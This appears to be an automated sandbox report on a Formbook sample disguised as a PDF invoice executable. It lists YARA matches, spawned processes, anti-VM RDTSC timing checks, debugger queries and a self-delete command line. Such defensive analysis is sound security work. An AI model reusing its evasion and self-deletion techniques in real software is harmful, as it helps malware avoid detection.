          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@17/8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsp8287.tmp
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Virustotal: Detection: 35%
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | ReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File read: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: unknown | Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
          Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041D067 push ss; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004152DB push esi; rep ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0040AB63 push esi; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00414DEF push ss; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041C597 push esi; ret
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041CE86 push esi; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00414F7F push FFFFFF97h; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071D067 push ss; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_007152DB push esi; rep ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0070AB63 push esi; iretd
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071B3FB push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071B45C push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00714DEF push ss; iretd
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071C597 push esi; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071CE86 push esi; iretd
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00714F7F push FFFFFF97h; iretd
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000007085E4 second address: 00000000007085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 000000000070896E second address: 0000000000708974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6872 | Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6776 | Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmp | Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.919593187.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.665596378.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.673241893.000000000A9CA000.00000004.00000001.sdmp | Binary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&|
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.671622692.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_VirXXH
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_026C163F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_026C1857 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
